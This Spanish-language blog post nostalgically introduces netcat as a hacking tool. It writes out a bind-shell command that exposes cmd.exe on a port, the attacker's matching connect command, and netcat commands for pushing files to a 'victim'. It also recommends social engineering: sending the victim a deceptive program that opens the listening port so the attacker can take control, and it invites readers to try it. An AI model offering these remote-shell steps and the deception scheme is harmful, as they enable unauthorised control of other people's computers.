Tiempos de oro, el reversing

Hola después de mucho tiempo. He dejado de escribir porque he estado bastante ocupado este año con la carrera y no he tenido el suficiente tiempo de inversigar nuevas cosas, espero que este año pueda traer nuevas sorpresas por el blog, por el momento he encontrado un viejo video de mis inicios al reversing, he decidido subirlo porque, aunque ahora carece de importancia, representa mi mayor época de entusiamo por el hacking.

Net Cat «la navaja multiusos»

Esta herramienta que hoy presento ocupa sobre unos 100kb y sus aplicaciones son infinitas(Desde montar un chat, hasta enviar ficheros o averiguar datos sonbre una web,hasta obtener shells remotas vía LAN o vía WAN).Por eso se ha hecho tan famosa y recibe el nombre de «la navaja multiusos del hacker».

¿Cómo obtener una shell?

Es tan sencillo como abrir una consola en el cliente y poner: nc.exe -L -e cmd.exe -p 6000
En el equipo atacante se pondría: nc.exe 192.168.0.3 6000 y ya estaríamos conectados al cliente.

Pero ocurre un problema,si queremos acceder a un equipo donde no tenemos acceso físico a la máquina siempre se puede utilizar la ingeniería social y enviar a la victima un programa engañoso que haga el trabajo de la parte del cliente del netcat,es decir abrir un puerto a la escucha para que nos podamos conectar y obtener el control del ordenador.Pues bien el programa está aquí:

Si complilamos el exe y lo ejecutamos hace exactamente la misma función.

Enviar y recibir archivos con NetCat

Para poder enviar y recibir archivos con net cat hay que ejecutar comandos en las dos maquinas,o compilar un exe que los ejecute por el netcat.De cualquier suponiendo que el atacante quiere enviar a la vicima,los comando son los siguientes:

Atacante: nc.exe 192.168.0.3 6000 < «archivo»
Víctima: nc.exe -l -p 6000 > «nombre que se le da al archivo»

Netcat se puede descarga aquí.

Y esto es todo por hoy,a probar y a comentar resultados.